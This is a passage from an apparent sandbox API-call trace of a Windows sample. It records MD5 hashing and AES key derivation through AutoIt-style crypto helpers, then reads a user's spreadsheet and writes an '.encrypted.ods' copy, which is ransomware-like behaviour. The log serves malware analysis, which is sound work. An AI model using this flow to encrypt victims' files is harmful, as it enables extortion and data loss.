wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0033.959] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTINC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTINC") returned 0x13 [0033.960] PeekMessageW (in: lpMsg=0x6ae8bc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae8bc) returned 0 [0033.960] PeekMessageW (in: lpMsg=0x6ae8bc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae8bc) returned 0 [0033.960] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0033.960] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0033.960] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0033.960] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0033.960] CharUpperBuffW (in: lpsz="_CRYPT_DERIVEKEY", cchLength=0x10 | out: lpsz="_CRYPT_DERIVEKEY") returned 0x10 [0033.960] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0033.960] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0033.960] CharUpperBuffW (in: lpsz="_CRYPT_STARTUP", cchLength=0xe | out: lpsz="_CRYPT_STARTUP") returned 0xe [0033.960] PeekMessageW (in: lpMsg=0x6ae5e4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae5e4) returned 0 [0033.960] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0033.960] PeekMessageW (in: lpMsg=0x6ae1c4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae1c4) returned 0 [0033.960] PeekMessageW (in: lpMsg=0x6ae5e4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae5e4) returned 0 [0033.960] PeekMessageW (in: lpMsg=0x6ae5e4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae5e4) returned 0 [0033.960] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTINC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTINC") returned 0x13 [0033.960] PeekMessageW (in: lpMsg=0x6ae38c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae38c) returned 0 [0033.960] PeekMessageW (in: lpMsg=0x6ae38c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae38c) returned 0 [0033.960] PeekMessageW (in: lpMsg=0x6ae5e4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae5e4) returned 0 [0033.960] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0033.960] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0033.960] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0033.960] PeekMessageW (in: lpMsg=0x6ae1d4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae1d4) returned 0 [0033.960] CharUpperBuffW (in: lpsz="__CRYPT_CONTEXT", cchLength=0xf | out: lpsz="__CRYPT_CONTEXT") returned 0xf [0033.960] PeekMessageW (in: lpMsg=0x6ae1d4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae1d4) returned 0 [0033.961] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0033.961] CryptCreateHash (in: hProv=0x7d5c40, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x6ae208 | out: phHash=0x6ae208) returned 1 [0033.961] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0033.961] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0033.961] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0033.961] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0033.961] CharLowerBuffW (in: lpsz="byte[256]", cchLength=0x9 | out: lpsz="byte[256]") returned 0x9 [0033.961] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0033.961] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0033.961] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0033.961] PeekMessageW (in: lpMsg=0x6ae1d4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae1d4) returned 0 [0033.961] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0033.961] CryptHashData (hHash=0x7c2100, pbData=0x7c97c8, dwDataLen=0x100, dwFlags=0x1) returned 1 [0033.961] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0033.961] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0033.961] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0033.961] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0033.961] PeekMessageW (in: lpMsg=0x6ae1d4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae1d4) returned 0 [0033.961] CharUpperBuffW (in: lpsz="__CRYPT_CONTEXT", cchLength=0xf | out: lpsz="__CRYPT_CONTEXT") returned 0xf [0033.961] PeekMessageW (in: lpMsg=0x6ae1d4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae1d4) returned 0 [0033.961] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0033.961] CryptDeriveKey (in: hProv=0x7d5c40, Algid=0x660e, hBaseData=0x7c2100, dwFlags=0x1, phKey=0x6ae208 | out: phKey=0x6ae208*=0x7c2200) returned 1 [0033.961] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0033.962] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0033.962] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0033.962] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0033.962] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0033.962] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0033.962] PeekMessageW (in: lpMsg=0x6ae344, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae344) returned 0 [0033.962] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0033.962] CryptDestroyHash (hHash=0x7c2100) returned 1 [0033.962] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0033.962] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0033.962] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0033.962] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0033.962] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0033.962] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\LkOIQE-AmAiAINSrD\\007meSo66\\JhnEQt\\PRo_og0ZRj3K\\gTXVbfxNeSRqjbX46\\bGB2.ods" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\lkoiqe-amaiainsrd\\007meso66\\jhneqt\\pro_og0zrj3k\\gtxvbfxnesrqjbx46\\bgb2.ods"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x128 [0033.962] SetFilePointerEx (in: hFile=0x128, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0033.962] SetFilePointerEx (in: hFile=0x128, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x6ae940 | out: lpNewFilePointer=0x0) returned 1 [0033.962] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1788 [0033.963] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cec8 [0033.963] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da1b8 [0033.963] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c8e0 | out: hHeap=0x770000) returned 1 [0033.963] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ceb0 | out: hHeap=0x770000) returned 1 [0033.963] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8891f0 | out: hHeap=0x770000) returned 1 [0033.963] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b16c0 | out: hHeap=0x770000) returned 1 [0033.963] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da318 | out: hHeap=0x770000) returned 1 [0033.963] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0033.963] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da318 [0033.963] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20a) returned 0x7b85a8 [0033.963] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da258 [0033.963] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b85a8 | out: hHeap=0x770000) returned 1 [0033.963] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da258 | out: hHeap=0x770000) returned 1 [0033.963] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da318 | out: hHeap=0x770000) returned 1 [0033.963] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x38) returned 0x7c2100 [0033.963] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0033.963] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7c2100 | out: hHeap=0x770000) returned 1 [0033.963] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0033.963] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da318 [0033.963] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b16c0 [0033.963] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8891f0 [0033.963] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da258 [0033.963] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ceb0 [0033.963] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da258 | out: hHeap=0x770000) returned 1 [0033.963] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c8e0 [0033.963] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da258 [0033.963] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da1f8 [0033.963] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x18) returned 0x7ae988 [0033.963] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ae988 | out: hHeap=0x770000) returned 1 [0033.963] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1f8 | out: hHeap=0x770000) returned 1 [0033.963] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da258 | out: hHeap=0x770000) returned 1 [0033.963] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c748 [0033.963] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da258 [0033.963] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cce8 [0033.963] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da1f8 [0033.964] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cd00 [0033.964] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da1d8 [0033.964] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8899a0 [0033.964] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da198 [0033.964] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ce68 [0033.964] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da2a8 [0033.964] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8897f0 [0033.964] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da218 [0033.964] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ce68 | out: hHeap=0x770000) returned 1 [0033.964] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x30) returned 0x7b4440 [0033.964] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da178 [0033.964] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x100) returned 0x7c97c8 [0033.964] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8899a0 | out: hHeap=0x770000) returned 1 [0033.964] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0xe0) returned 0x7c9b60 [0033.964] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cce8 | out: hHeap=0x770000) returned 1 [0033.964] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0xe0) returned 0x7c9c48 [0033.964] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7c97c8 | out: hHeap=0x770000) returned 1 [0033.964] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da178 | out: hHeap=0x770000) returned 1 [0033.964] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8897f0 | out: hHeap=0x770000) returned 1 [0033.964] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da218 | out: hHeap=0x770000) returned 1 [0033.964] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b4440 | out: hHeap=0x770000) returned 1 [0033.964] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da2a8 | out: hHeap=0x770000) returned 1 [0033.964] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7c9b60 | out: hHeap=0x770000) returned 1 [0033.964] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da198 | out: hHeap=0x770000) returned 1 [0033.964] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cd00 | out: hHeap=0x770000) returned 1 [0033.964] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1d8 | out: hHeap=0x770000) returned 1 [0033.964] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da1d8 [0033.965] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0xe0) returned 0x7c9b60 [0033.965] GetFileAttributesW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\LkOIQE-AmAiAINSrD\\007meSo66\\JhnEQt\\PRo_og0ZRj3K\\gTXVbfxNeSRqjbX46\\" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\lkoiqe-amaiainsrd\\007meso66\\jhneqt\\pro_og0zrj3k\\gtxvbfxnesrqjbx46")) returned 0x10 [0033.965] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7c9b60 | out: hHeap=0x770000) returned 1 [0033.965] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1d8 | out: hHeap=0x770000) returned 1 [0033.965] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7c9c48 | out: hHeap=0x770000) returned 1 [0033.965] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1f8 | out: hHeap=0x770000) returned 1 [0033.965] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c748 | out: hHeap=0x770000) returned 1 [0033.965] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da258 | out: hHeap=0x770000) returned 1 [0033.965] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x38) returned 0x7c2100 [0033.965] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10000) returned 0x945010 [0033.965] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c748 [0033.965] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da258 [0033.965] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\LkOIQE-AmAiAINSrD\\007meSo66\\JhnEQt\\PRo_og0ZRj3K\\gTXVbfxNeSRqjbX46\\bGB2.encrypted.ods" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\lkoiqe-amaiainsrd\\007meso66\\jhneqt\\pro_og0zrj3k\\gtxvbfxnesrqjbx46\\bgb2.encrypted.ods"), dwDesiredAccess=0xc0000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x140 [0033.968] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1918 [0033.968] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cd00 [0033.968] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da1f8 [0033.968] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ceb0 | out: hHeap=0x770000) returned 1 [0033.968] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8891f0 | out: hHeap=0x770000) returned 1 [0033.968] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c8e0 | out: hHeap=0x770000) returned 1 [0033.968] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b16c0 | out: hHeap=0x770000) returned 1 [0033.968] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da318 | out: hHeap=0x770000) returned 1 [0033.968] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0033.968] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da318 [0033.968] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20a) returned 0x7b85a8 [0033.968] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da1d8 [0033.968] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b85a8 | out: hHeap=0x770000) returned 1 [0033.968] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1d8 | out: hHeap=0x770000) returned 1 [0033.968] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da318 | out: hHeap=0x770000) returned 1 [0033.968] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x38) returned 0x7c21c0 [0033.968] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0033.968] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7c21c0 | out: hHeap=0x770000) returned 1 [0033.968] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0033.968] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x38) returned 0x7c21c0 [0033.968] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0033.968] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da318 [0033.968] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b16c0 [0033.968] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c8e0 [0033.968] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da1d8 [0033.968] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1d8 | out: hHeap=0x770000) returned 1 [0033.968] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8891f0 [0033.968] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da1d8 [0033.968] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da198 [0033.968] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x18) returned 0x7ae988 [0033.969] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ae988 | out: hHeap=0x770000) returned 1 [0033.969] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da198 | out: hHeap=0x770000) returned 1 [0033.969] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1d8 | out: hHeap=0x770000) returned 1 [0033.969] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ceb0 [0033.969] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8897f0 [0033.969] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da1d8 [0033.969] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x100000) returned 0x1090020 [0033.969] SetFilePointerEx (in: hFile=0x128, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x6ae990 | out: lpNewFilePointer=0x0) returned 1 [0033.969] ReadFile (in: hFile=0x128, lpBuffer=0x935008, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x6ae9b8, lpOverlapped=0x0 | out: lpBuffer=0x935008*, lpNumberOfBytesRead=0x6ae9b8*=0x10000, lpOverlapped=0x0) returned 1 [0033.971] ReadFile (in: hFile=0x128, lpBuffer=0x935008, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x6ae9b8, lpOverlapped=0x0 | out: lpBuffer=0x935008*, lpNumberOfBytesRead=0x6ae9b8*=0x27d4, lpOverlapped=0x0) returned 1 [0033.971] ReadFile (in: hFile=0x128, lpBuffer=0x935008, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x6ae9b8, lpOverlapped=0x0 | out: lpBuffer=0x935008*, lpNumberOfBytesRead=0x6ae9b8*=0x0, lpOverlapped=0x0) returned 1 [0033.971] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8897f0 | out: hHeap=0x770000) returned 1 [0033.971] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1d8 | out: hHeap=0x770000) returned 1 [0033.971] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ceb0 | out: hHeap=0x770000) returned 1 [0033.971] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da1d8 [0033.971] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x127d4) returned 0x955018 [0033.971] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x1090020 | out: hHeap=0x770000) returned 1 [0033.972] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c8e0 | out: hHeap=0x770000) returned 1 [0033.972] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8891f0 | out: hHeap=0x770000) returned 1 [0033.972] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b16c0 | out: hHeap=0x770000) returned 1 [0033.972] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da318 | out: hHeap=0x770000) returned 1 [0033.972] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da318 [0033.972] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x127d4) returned 0x9677f8 [0033.973] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x955018 | out: hHeap=0x770000) returned 1 [0033.973] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1d8 | out: hHeap=0x770000) returned 1 [0033.973] PeekMessageW 